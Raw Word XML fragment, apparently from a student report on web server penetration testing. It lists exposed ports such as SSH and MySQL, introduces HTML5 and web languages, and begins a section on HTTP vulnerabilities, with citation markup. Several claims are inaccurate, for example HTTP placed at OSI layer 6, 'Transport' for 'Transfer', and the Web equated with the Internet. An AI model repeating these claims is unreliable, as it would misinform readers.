          <w:p w14:paraId="529606AD" w14:textId="3B272B0C" w:rsidR="00C05CF6" w:rsidRPr="00527C88" w:rsidRDefault="00C05CF6" w:rsidP="00E943D8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00527C88">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="608AFC7A" w14:textId="68AB4F9C" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="00E943D8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F04C829" w14:textId="0F1A153A" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="00E943D8">
            <w:r>
              <w:t>Cryptographic Remote Shell device configuration utility</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C05CF6" w14:paraId="48C7B760" w14:textId="77777777" w:rsidTr="00C05CF6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="0A0A38FB" w14:textId="763C058B" w:rsidR="00C05CF6" w:rsidRPr="00527C88" w:rsidRDefault="00C05CF6" w:rsidP="00E943D8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4538B8D8" w14:textId="77AD8E9E" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="00E943D8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>3306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C181122" w14:textId="58453D9B" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="00C05CF6">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Relationship backend website database access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="110F3730" w14:textId="20B7D2E2" w:rsidR="00527C88" w:rsidRPr="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="00C05CF6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc40134141"/>
      <w:r w:rsidRPr="00C05CF6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="00C05CF6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C05CF6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C05CF6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00C05CF6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05CF6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C05CF6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Known Vulnerable Webserver Ports and Services</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="1DF202CD" w14:textId="702CC059" w:rsidR="008F0A8A" w:rsidRPr="00527C88" w:rsidRDefault="008F0A8A" w:rsidP="00F42B45">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">During the information gathering stage of the penetration test, these ports will be the focus of the </w:t>
      </w:r>
      <w:r w:rsidR="003D7008">
        <w:t xml:space="preserve">initial </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">investigation for </w:t>
      </w:r>
      <w:r w:rsidR="003D7008">
        <w:t>possible</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploitation</w:t>
      </w:r>
      <w:r w:rsidR="003D7008">
        <w:t xml:space="preserve"> along with any other unorthodox ports that may be exposed that will require further research for vulnerabilities and possible exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C411F" w14:textId="77777777" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc40134036"/>
      <w:r>
        <w:t>2.3 Hyper Text Mark-Up Language 5 (HTML5) and Database Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="19C7DA0A" w14:textId="0664FA3D" w:rsidR="00D772F6" w:rsidRDefault="008F31A6" w:rsidP="008F31A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hyper Text Mark-up Language (HTML) is a high-level website development computer programming language </w:t>
      </w:r>
      <w:r w:rsidR="003F15E1">
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the foundational building block of all websites, </w:t>
      </w:r>
      <w:r w:rsidR="003F15E1">
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is interpreted by website browsers. HTML was created by Sir Tim Berners-Lee in 1990 to be utilised </w:t>
      </w:r>
      <w:r w:rsidR="00D772F6">
        <w:t>within the World Wide Web that he created a year before in 1989 that is now known as the Internet.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF09BF">
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF09BF">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00BF09BF">
        <w:t xml:space="preserve"> is the latest version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> released in 2016</w:t>
      </w:r>
      <w:r w:rsidR="00D772F6">
        <w:t xml:space="preserve"> that was created by the </w:t>
      </w:r>
      <w:r w:rsidR="00D772F6" w:rsidRPr="00D772F6">
        <w:t>World Wide Web Consortium (W3C)</w:t>
      </w:r>
      <w:r w:rsidR="00006CB1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D772F6">
        <w:t xml:space="preserve"> led by Sir Tim Burners-Lee</w:t>
      </w:r>
      <w:r w:rsidR="003F15E1">
        <w:t xml:space="preserve"> in 1994</w:t>
      </w:r>
      <w:r w:rsidR="00D772F6">
        <w:t xml:space="preserve"> who founded the organisation</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00006CB1">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"Sir Tim Berners-Lee invented the World Wide Web in 1989","author":[{"dropping-particle":"","family":"World Wide Web Foundation","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"The Web","id":"ITEM-1","issued":{"date-parts":[["2008"]]},"title":"History of the Web","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=8748f2a7-e444-473f-b470-7fd701f16f52"]},{"id":"ITEM-2","itemData":{"DOI":"10.1163/ej.9789004163300.i-1081.558","ISBN":"9789004181564","author":[{"dropping-particle":"","family":"Grosz","given":"Mirina","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Handbook of Transnational Economic Governance Regimes","id":"ITEM-2","issued":{"date-parts":[["2009"]]},"title":"World wide web consortium","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=0a70dd5f-b5a0-4a5a-8cd0-6a545352b01d"]},{"id":"ITEM-3","itemData":{"DOI":"10.1007/978-1-4302-3292-6_1","abstract":"Suddenly, everyone's talking about HTML5, and ready or not, you need to get acquainted with this powerful new development in web and application design. Some of its new features are already being implemented by existing browsers, and much more is around the corner. Written by developers who have been using the new language for the past year in their work, this book shows you how to start adapting the language now to realize its benefits on today's browsers. Rather than being just an academic investigation, it concentrates on the practical-the problems HTML5 can solve for you right away. By following the book's hands-on HTML5 code examples you'll learn: new semantics and structures to help your site become richer and more accessiblehow to apply the most important JavaScript APIs that are already implementedthe uses of native multimedia for video and audiotechniques for drawing lines, fills, gradients, images and text with canvas how to build more intelligent web formsimplementation of new storage options and web databaseshow geolocation works with HTML5 in both web and mobile applicationsThere appear to be intermittent problems with the first printing of Introducing HTML5. If you have one of these copies, please email us at askpeachpit.com with a copy of your receipt (from any reseller), and we'll either provide access to the eBook or send you another copy of the print book (est. to arrive the week of August 23)- whichever you prefer. If you'd like the eBook we can add that to your Peachpit.com account. You can set up a free account at www.peachpit.com/join http: //www.peachpit.com/join&gt;. Thanks so much for your understanding!","author":[{"dropping-particle":"","family":"Hawkes","given":"Rob","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hawkes","given":"Rob","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Foundation HTML5 Canvas","id":"ITEM-3","issued":{"date-parts":[["2011"]]},"title":"Introducing HTML5","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=39e57562-f83f-4381-9e5c-033eedb9f0df"]},{"id":"ITEM-4","itemData":{"ISBN":"978-1-4493-6326-0","abstract":"HTML5 is more than a markup language—it’s a collection of several independent web standards. Fortunately, this expanded guide covers everything you need in one convenient place. With step-by-step tutorials and real-world examples, HTML5: The Missing Manual shows you how to build web apps that include video tools, dynamic graphics, geolocation, offline features, and responsive layouts for mobile devices.","author":[{"dropping-particle":"","family":"MacDonald","given":"Matthew","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Missing manual","id":"ITEM-4","issued":{"date-parts":[["2014"]]},"title":"HTML5: the missing manual","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=5204adcb-c15b-4135-aea8-80247da440c7"]}],"mendeley":{"formattedCitation":"[3], [66]–[68]","plainTextFormattedCitation":"[3], [66]–[68]","previouslyFormattedCitation":"[3], [66]–[68]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00006CB1">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00006CB1" w:rsidRPr="00006CB1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[3], [66]–[68]</w:t>
      </w:r>
      <w:r w:rsidR="00006CB1">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C363034" w14:textId="54BC0627" w:rsidR="00D772F6" w:rsidRDefault="008F31A6" w:rsidP="008F31A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTML is utilised as the underlying framework </w:t>
      </w:r>
      <w:r w:rsidR="00D772F6">
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D772F6">
        <w:t>high-level</w:t>
      </w:r>
      <w:r w:rsidR="00D74744">
        <w:t xml:space="preserve"> computer programming</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> languages</w:t>
      </w:r>
      <w:r w:rsidR="00D74744">
        <w:t xml:space="preserve"> to be  imbedded within the HTML framework</w:t>
      </w:r>
      <w:r w:rsidR="00D772F6">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D74744">
        <w:t xml:space="preserve">these languages are utilsed to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">provide </w:t>
      </w:r>
      <w:r w:rsidR="00D772F6">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00DA7CB6">
        <w:t>very high</w:t>
      </w:r>
      <w:r w:rsidR="00D772F6">
        <w:t xml:space="preserve"> level of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> functionality</w:t>
      </w:r>
      <w:r w:rsidR="00D772F6">
        <w:t xml:space="preserve"> to create dynamic websites that </w:t>
      </w:r>
      <w:r w:rsidR="00DA7CB6">
        <w:t>deliver</w:t>
      </w:r>
      <w:r w:rsidR="00D772F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D74744">
        <w:t xml:space="preserve">highly functional and powerful </w:t>
      </w:r>
      <w:r w:rsidR="00D772F6">
        <w:t xml:space="preserve">application services, the core </w:t>
      </w:r>
      <w:r w:rsidR="00212456">
        <w:t>high level</w:t>
      </w:r>
      <w:r w:rsidR="00D772F6">
        <w:t xml:space="preserve"> languages utilised within HTML are; JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.3139/9783446439474.fm","abstract":"Predicting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teyer","given":"Ralph","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Steyer","given":"Ralph","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"JavaScript","id":"ITEM-1","issued":{"date-parts":[["2014"]]},"title":"JavaScript","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=751541e6-e2cc-4074-83f0-cbf27d463f75"]}],"mendeley":{"formattedCitation":"[69]","plainTextFormattedCitation":"[69]","previouslyFormattedCitation":"[69]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D002F2" w:rsidRPr="00D002F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[69]</w:t>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D772F6">
        <w:t>, PHP</w:t>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1201/b18327-18","abstract":"Being highly flexible in building dynamic, database-driven web applications makes the PHP programming language one of the most popular web development tools in use today. It also works beautifully with other open source tools, such as the MySQL database and the Apache web server. However, as more web sites are developed in PHP, they become targets for malicious attackers, and developers need to prepare for the attacks. Security is an issue that demands attention, given the growing frequency of attacks on web sites. Essential PHP Security explains the most common types of attacks and how to write code that isn't susceptible to them. By examining specific attacks and the techniques used to protect against them, you will have a deeper understanding and appreciation of the safeguards you are about to learn in this book. In the much-needed (and highly-requested) Essential PHP Security, each chapter covers an aspect of a web application (such as form processing, database programming, session management, and authentication). Chapters describe potential attacks with examples and then explain techniques to help you prevent those attacks. Topics covered include: Preventing cross-site scripting (XSS) vulnerabilities Protecting against SQL injection attacks Complicating session hijacking attempts You are in good hands with author Chris Shiflett, an internationally-recognized expert in the field of PHP security. Shiflett is also the founder and President of Brain Bulb, a PHP consultancy that offers a variety of services to clients around the world.","author":[{"dropping-particle":"","family":"Wu","given":"Hanqing","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhao","given":"Liz","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Web Security","id":"ITEM-1","issued":{"date-parts":[["2015"]]},"title":"PHP Security","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=6896f830-9139-4374-91f3-17cff23054e2"]}],"mendeley":{"formattedCitation":"[47]","plainTextFormattedCitation":"[47]","previouslyFormattedCitation":"[47]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D002F2" w:rsidRPr="00D002F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[47]</w:t>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00212456">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D772F6">
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"ISBN":"9781430230038","abstract":"Over 70 detailed recipes to develop practical solutions for a wide range of real-world network programming tasks This book highlights major aspects of network programming in Python starting from writing simple networking clients, to developing complex screen-scraping and network security monitoring scripts. It creates the building blocks for many practical web and networking applications that rely on various networking protocols. This book presents the power and beauty of Python in solving the numerous real-world tasks in the area of network programming, system and network administration, network monitoring, and web-application development. This book develops your ability to solve a wide range of network programming tasks in Python. We will start by exploring the Python standard library functions to create client/server network and manipulate your local networking resources available under both IPv4 and IPv6. The practical focus continues with creating web and email clients, scraping web pages, fetching information from various websites, and searching for information on the Web such as Amazon, Flickr, and other sites. It further develops your skills to analyze your network security vulnerabilities using advanced network packet capture and analysis techniques.","author":[{"dropping-particle":"V","family":"Tiponut","given":"Sebastian","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"_book","id":"ITEM-1","issued":{"date-parts":[["2001"]]},"title":"Python Network Programming","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=ab667747-8361-445e-8b54-4e990508fcab"]}],"mendeley":{"formattedCitation":"[70]","plainTextFormattedCitation":"[70]","previouslyFormattedCitation":"[70]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D002F2" w:rsidRPr="00D002F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[70]</w:t>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C825E9">
        <w:t>, Structures Query Language (SQL)</w:t>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"ISBN":"9780596520830","ISSN":"00978418","PMID":"25246403","abstract":"Published August 2005, 306 pages. SUMMARY: SQL (Structured Query Language) is a standard programming language for generating, manipulating, and retrieving information from a relational database. If you're working with a relational database-whether you're writing applications, performing administrative tasks, or generating reports-you need to know how to interact with your data. Even if you are using a tool that generates SQL for you, such as a reporting tool, there may still be cases where you need to bypass the automatic generation feature and write your own SQL statements. To help you attain this fundamental SQL knowledge, look to \"Learning SQL,\" an introductory guide to SQL, designed primarily for developers just cutting their teeth on the language. \"Learning SQL\" moves you quickly through the basics and then on to some of the more commonly used advanced features. Among the topics discussed: The history of the computerized database SQL Data Statements-those used to create, manipulate, and retrieve data stored in your database; example statements include select, update, insert, and delete SQL Schema Statements-those used to create database objects, such as tables, indexes, and constraints How data sets can interact with queries The importance of subqueries Data conversion and manipulation via SQL's built-in functions How conditional logic can be used in Data Statements Best of all, \"Learning SQL\" talks to you in a real-world manner, discussing various platform differences that you're likely to encounter and offering a series of chapter exercises that walk you through the learning process. Whenever possible, the book sticks to the features included in the ANSI SQL standards. This means you'll be able to apply what you learn to any of several different databases; the book covers MySQL, Microsoft SQL Server, and Oracle Database, but the features and syntax should apply just as well (perhaps with some tweaking) to IBM DB2, Sybase Adaptive Server, and PostgreSQL. Put the power and flexibility of SQL to work. With \"Learning SQL\" you can master this important skill and know that the SQL statements you write are indeed correct.","author":[{"dropping-particle":"","family":"Beaulieu","given":"Alan","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Database","id":"ITEM-1","issued":{"date-parts":[["2009"]]},"title":"Learning SQL","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=f121a06c-e9e9-4f35-9998-27a5ec9c2dd1"]}],"mendeley":{"formattedCitation":"[71]","plainTextFormattedCitation":"[71]","previouslyFormattedCitation":"[71]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D002F2" w:rsidRPr="00D002F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[71]</w:t>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00212456">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00C825E9">
        <w:t>.NET (</w:t>
      </w:r>
      <w:r w:rsidR="00212456">
        <w:t>C/C#/C++</w:t>
      </w:r>
      <w:r w:rsidR="00C825E9">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"ISBN":"0782140467","abstract":"C is the hot new language from Microsoft, designed specifically for the new .NET platform for application development. Visual C .NET Programming provides a comprehensive introduction to the principals of C programming but has a different emphasis from many other books. Because the language is so well-suited to the creation of Web Services, author Harold Davis emphasizes this application throughout the book. In the beginning of the book, you create a simple Web Service; by the end, you will be able to create a much more complex Web Service. You also learn the fundamentals of object-oriented programming with C, creating user interfaces for Windows applications, working with files and directories, and working with XML and ADO.NET. Davis has an established reputation as a teacher of introductory programming concepts. This book is the perfect companion to his Visual Basic .NET Programming.","author":[{"dropping-particle":"","family":"Davis","given":"Harold","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Garber","given":"Proofreaders Amey","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kim","given":"Nelson","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Nash","given":"David","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Connell","given":"Laurie O","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Rabinovitch","given":"Yariv","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Constraints","id":"ITEM-1","issued":{"date-parts":[["2002"]]},"title":"Visual C # . NET Programming","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=44216d21-62b9-4955-9559-3bc92aa4aedb"]}],"mendeley":{"formattedCitation":"[72]","plainTextFormattedCitation":"[72]","previouslyFormattedCitation":"[72]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D002F2" w:rsidRPr="00D002F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[72]</w:t>
      </w:r>
      <w:r w:rsidR="00D002F2">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D772F6">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB2597A" w14:textId="4A3C02DB" w:rsidR="0064079E" w:rsidRDefault="0064079E" w:rsidP="0064079E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc40134037"/>
      <w:r>
        <w:t xml:space="preserve">2.3.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="0064079E">
        <w:t>Hyper Te</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="0064079E">
        <w:t>t Transport Protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Secure</w:t>
      </w:r>
      <w:r w:rsidRPr="0064079E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(HTTP) Vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="0D557FE0" w14:textId="6BC51211" w:rsidR="00BF09BF" w:rsidRDefault="00BF09BF" w:rsidP="008F31A6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Hyper Te</w:t>
      </w:r>
      <w:r w:rsidR="0064079E">
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>t Transport Protocol (HTTP)</w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1016/b978-0-12-811027-0.00026-6","abstract":"The Hypertext Transfer Protocol (HTTP) is an application-level protocol for distributed, collaborative, hypermedia information systems. It is a generic, stateless, protocol which can be used for many tasks beyond its use for hypertext, such as name servers and distributed object management systems, through extension of its request methods, error codes and headers . A feature of HTTP is the typing and negotiation of data representation, allowing systems to be built independently of the data being transferred. HTTP has been in use by the World-Wide Web global information initiative since 1990. This specification defines the protocol referred to as \"HTTP/1.1\", and is an update to RFC 2068 .","author":[{"dropping-particle":"","family":"Goralski","given":"Walter","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"The Illustrated Network","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"Hypertext Transfer Protocol","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=c529a56b-bbf1-48e1-bbae-67b19b1d4f7d"]}],"mendeley":{"formattedCitation":"[73]","plainTextFormattedCitation":"[73]","previouslyFormattedCitation":"[73]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E678E7" w:rsidRPr="00E678E7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[73]</w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D74744">
        <w:t>is utilised by website browsers</w:t>
      </w:r>
      <w:r w:rsidR="0048407D">
        <w:t xml:space="preserve"> to present data at the presentation layer (layer 6) of the Open Systems Interconnection (OSI)</w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E678E7">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00E678E7">
